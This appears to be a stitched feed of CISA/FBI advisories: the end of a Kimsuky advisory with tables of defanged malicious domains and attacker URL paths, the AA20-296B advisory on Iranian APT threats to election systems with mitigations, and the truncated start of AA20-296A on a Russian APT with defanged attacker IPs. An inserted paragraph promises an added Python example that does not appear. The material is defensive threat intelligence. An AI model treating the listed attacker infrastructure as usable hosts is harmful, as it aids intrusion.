style="margin-bottom: 8px;"><code>myetherwallet.co[.]in </code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>loadmanager07[.]com</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>top.naver.onekda[.]com</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; 
border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-download[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-option[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-sslnet[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-vps[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>com-ssl[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>desk-top[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>intemet[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>jp-ssl[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: 
none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>org-vip[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>sslport[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>sslserver[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>ssltop[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>taplist[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>vpstop[.]work</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;" valign="top"> <p style="margin-bottom: 8px;"><code>webmain[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;" valign="top"> <p style="margin-bottom: 8px;"><code>preview.manage.org-view[.]work</code></p> </td> <td style="border-width: medium 1px 1px medium; 
border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;" valign="top"> <p style="margin-bottom: 8px;"><code>intranet.ohchr.account-protect[.]work</code></p> </td> </tr> </tbody> </table> <p style="margin-bottom: 8px;"><font color="#000000"><font size="3">&nbsp;</font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Table 2: Redacted domains used by Kimsuky</em></p> <table style="border: medium none; width: 737px; border-collapse: collapse; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="padding: 0in 7px; border: 1px solid black; border-image: none; width: 200px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/dwn[.]php?van=101</code></p> </td> <td style="border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 230px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/dwn[.]php?v%20an=101</code></p> </td> <td style="border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 261px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/dwn[.]php?van=102</code></p> </td> </tr> <tr> <td style="border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 200px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/home/up[.]php?id=NQDPDE</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 230px;" valign="top"> <p style="margin-top: 8px;"><code>[REDACTED]/test/Update[.]php?wShell=201</code></p> </td> <td style="border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 
0in 7px; width: 261px;" valign="top"> <p style="margin-bottom: 8px;"><code><font color="#000000"><font size="3">&nbsp;</font></font></code></p> </td> </tr> </tbody> </table> <h3>Contact Information</h3><p style="margin-top: 8px; margin-bottom: 8px;">To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="https://us-cert.cisa.gov mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p> <div class="special_container text-align-center">&nbsp;</div> <div class="special_container text-align-center"><strong><em>DISCLAIMER</em></strong></div> <div class="special_container">&nbsp;</div> <div class="special_container"> <p><em>This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. 
In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p>
<p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p> </div>
<h3>Revisions</h3>
<ul> <li>October 27, 2020: Initial Version</li> </ul>
<hr />
<p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p>

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems
Original release date: October 22, 2020<br/><h3>Summary</h3><p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.</p> <p>The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.</p> <p>The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.</p> <p>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296B_Iranian_APT_Actors_Threaten_Election-Related_Systems.pdf">PDF</a> version of this report.</p> <h3>Technical Details</h3><p class="MsoNormal">These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9248">CVE-2017-9248</a>—pertaining to virtual private networks (VPNs) and content management systems (CMSs).</p> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a> affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code. [<a href="https://support.f5.com/csp/article/K52145254">1</a>]</li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9248">CVE-2017-9248</a> affects Telerik UI. 
Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks. [<a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">2</a>]</li> </ul> <p>Historically, these actors have conducted DDoS attacks, SQL injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render election-related systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.</p> <ul> <li><strong>A DDoS attack </strong>could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.</li> <li><strong>A SQL injection</strong> involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could give a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.</li> <li><strong>Spear-phishing messages</strong> may not be easily detectable. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. 
A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.</li> <li><strong>Public-facing website defacements</strong> typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised.</li> <li><strong>Disinformation campaigns </strong>involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.</li> </ul> <h3>Mitigations</h3><p>The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:</p> <ul> <li>Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. 
Types of attacks possibly prevented include SQL injection, XSS, and command injection.</li> <li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li> <li>Verify that cloud-based virtual machine instances with a public IP do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.</li> <li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li> <li>Apply multi-factor authentication, when possible.</li> <li>Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248. <ul> <li>For patch information on CVE-2020-5902, refer to F5 Security Advisory <a href="https://support.f5.com/csp/article/K52145254">K52145254</a>.</li> <li>For patch information on CVE-2017-9248, refer to <a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">Progress Telerik details for CVE-2017-9248</a>.</li> </ul> </li> <li>Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.</li> <li>Enable logging and ensure logging mechanisms capture RDP logins. 
Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.</li> <li>When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.</li> <li>Ensure third parties that require RDP access are required to follow internal policies on remote access.</li> <li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li> <li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.</li> <li>Be aware of unsolicited contact on social media from any individual you do not know.</li> <li>Be aware of attempts to pass links or files via social media from anyone you do not know.</li> <li>Be aware of unsolicited requests to share a file via online services.</li> <li>Be aware of email messages conveying suspicious alerts about your online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.</li> <li>Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).</li> <li>Be suspicious of unsolicited email messages that contain shortened links (e.g., via <code>tinyurl</code>, <code>bit.ly</code>).</li> <li>Use security features provided by social media platforms, use <a href="https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords">strong passwords</a>, change passwords frequently, and use a different password for each social media account.</li> <li>See CISA’s <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Tip on Best Practices for Securing Election Systems</a> for 
more information.</li> </ul> <h4>General Mitigations</h4> <h5>Keep applications and systems updated and patched</h5> <p>Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle. [<a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1">3</a>] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool [<a href="https://owasp.org/www-project-dependency-check/">4</a>]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.</p> <h5>Scan web applications for SQL injection and other common web vulnerabilities</h5> <p>Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner. [<a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm">5</a>] As vulnerabilities are found, they should be fixed or patched. 
This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.</p> <h5>Deploy a web application firewall</h5> <p>Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.</p> <h5>Deploy techniques to protect against web shells</h5> <p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. [<a href="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF">6</a>] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. 
Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.</p> <h5>Use multi-factor authentication for administrator accounts</h5> <p>Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets. [<a href="https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs">7</a>] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). [<a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">8</a>] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p> <h5>Remediate critical web application security risks</h5> <p>First, identify and remediate critical web application security risks; then move on to other, less critical vulnerabilities. Follow available guidance on securing web applications. [<a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm">9</a>], [<a href="https://owasp.org/www-project-top-ten/">10</a>], [<a href="https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html">11</a>]</p> <h5>How do I respond to unauthorized access to election-related systems?</h5> <h6>Implement your security incident response and business continuity plan</h6> <p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. 
Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p> <h6>Contact CISA or law enforcement immediately</h6> <p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a> or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (<a href="mailto:CyWatch@ic.fbi.gov">CyWatch@ic.fbi.gov</a> or 855-292-3937).</p> <h3>Resources</h3> <ul> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">CISA Tip:&nbsp;Best Practices for Securing Election Systems</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST16-001">CISA Tip:&nbsp;Securing Voter Registration Data</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST18-006">CISA Tip:&nbsp;Website Security</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip:&nbsp;Avoiding Social Engineering and Phishing Attacks</a></li> <li><a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">CISA Tip:&nbsp;Securing Network Infrastructure Devices</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">CISA Activity Alert:&nbsp;Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li><a href="https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf">CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities</a></li> <li>FBI and CISA Public Service Announcement (PSA): <a href="https://ic3.gov/Media/Y2020/PSA201002">Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li> <li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA201001">Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 
Elections</a></li> <li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA200930">Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a></li> <li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA200928">False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200924">Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a></li> <li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200922">Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results</a></li> </ul> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p> <h3>References</h3> <ul> <li><a href="https://support.f5.com/csp/article/K52145254">[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> <li><a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">[2] Progress Telerik details for CVE-2017-9248</a></li> <li><a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">[3] NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies"</a></li> <li><a href="https://owasp.org/www-project-dependency-check/">[4] OWASP Dependency-Check</a></li> <li><a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm">[5] NSA "Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network"</a></li> <li><a href="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF">[6] NSA & ASD "CyberSecurity Information: Detect and Prevent Web Shell Malware"</a></li> <li><a href="https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs">[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs</a></li> <li><a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">[8] NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies"</a></li> <li><a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm">[9] NSA “Building Web Applications – Security for Developers”</a></li> <li><a 
href="https://owasp.org/www-project-top-ten/">[10] OWASP Top Ten</a></li> <li><a href="https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html">[11] 2020 CWE Top 25 Most Dangerous Software Weaknesses</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 22, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
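As an added example (not part of the advisory above), the SQL injection mechanism AA20-296B describes, unsanitized entry-field input reaching a query, is shown beside the two mitigations the advisory recommends for it: input validation and correct query construction. It uses Python's sqlite3 on constructed rows; the CMS table, its columns and the author-handle allow-list are assumptions.

```python
"""Added example, not from the CISA advisory: a vulnerable query beside its
hardened form, run against an in-memory SQLite database with constructed rows."""
import re
import sqlite3

# Constructed sample data: an "articles" table standing in for a media-site CMS.
SAMPLE_ROWS = [
    ("alice", "Election results roundup", "published"),
    ("bob", "Draft: county turnout analysis", "draft"),
    ("carol", "Editorial notes", "draft"),
]

# A tautology input of the kind the advisory describes: it closes the string
# literal, adds an always-true condition and comments out the rest of the query.
CRAFTED_INPUT = "x' OR '1'='1' --"


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (author TEXT, title TEXT, status TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def published_titles_vulnerable(conn: sqlite3.Connection, author: str) -> list:
    # VULNERABLE: the entry-field value is spliced into the SQL text, so quote
    # characters in the input change the query's structure instead of being data.
    sql = (f"SELECT title FROM articles WHERE author = '{author}' "
           f"AND status = 'published'")
    return [row[0] for row in conn.execute(sql)]


def published_titles_parameterized(conn: sqlite3.Connection, author: str) -> list:
    # FIX 1: bind the value as a parameter; the driver never parses it as SQL,
    # so a crafted value simply matches no author.
    sql = "SELECT title FROM articles WHERE author = ? AND status = 'published'"
    return [row[0] for row in conn.execute(sql, (author,))]


# Allow-list for an author handle (an assumption about this hypothetical CMS).
AUTHOR_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_author(value: str) -> str:
    """FIX 2 (defense in depth): reject input outside the allow-list before it
    reaches any query, template or shell call (the advisory's "validate input")."""
    if not AUTHOR_RE.fullmatch(value):
        raise ValueError("author handle contains disallowed characters")
    return value


def published_titles_hardened(conn: sqlite3.Connection, author: str) -> list:
    # Validation layered on parameterization.
    return published_titles_parameterized(conn, validate_author(author))


def demo() -> dict:
    """Run honest and crafted input through all three variants."""
    conn = make_db()
    out = {
        "vuln_honest": published_titles_vulnerable(conn, "alice"),
        # Returns every title, drafts included: the status filter was commented out.
        "vuln_crafted": published_titles_vulnerable(conn, CRAFTED_INPUT),
        # Parameter binding: the crafted string is looked up as a literal author.
        "param_crafted": published_titles_parameterized(conn, CRAFTED_INPUT),
        "hard_honest": published_titles_hardened(conn, "alice"),
    }
    try:
        published_titles_hardened(conn, CRAFTED_INPUT)
        out["hard_crafted"] = "accepted"
    except ValueError:
        out["hard_crafted"] = "rejected"
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>14}: {result}")
```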

AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets
Original release date: October 22, 2020 | Last revised: November 17, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor tactics and techniques.</em></p> <p>This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-283a">AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations</a>.</p> <p>Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.</p> <p>The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. 
In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:</p> <ul> <li>Sensitive network configurations and passwords.</li> <li>Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).</li> <li>IT instructions, such as requesting password resets.</li> <li>Vendors and purchasing information.</li> <li>Printing access badges.</li> </ul> <p>To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.</p> <p>As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.</p> <ul> <li>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf">PDF</a> version of this report.</li> <li>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-296A.stix.xml">STIX</a> package of IOCs.</li> </ul> <h4>U.S. Heat Map of Activity</h4> <p><a href="https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769">Click here</a> for an interactive heat map of this activity. Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. 
These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.</p> <p><strong>Note</strong>: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email <a href="mailto:info@us-cert.gov">info@us-cert.gov</a>. To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.</p> <p><strong>Note</strong>: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.</p> <h3>Technical Details</h3><p>The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses <code>213.74.101[.]65</code>, <code>213.74.139[.]196</code>, and <code>212.252.30[.]170</code> to connect to victim web servers (<em>Exploit Public Facing Application</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190/">T1190</a>]).</p> <p>The actor is using <code>213.74.101[.]65</code> and <code>213.74.139[.]196</code> to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (<em>Brute Force</em> [<a 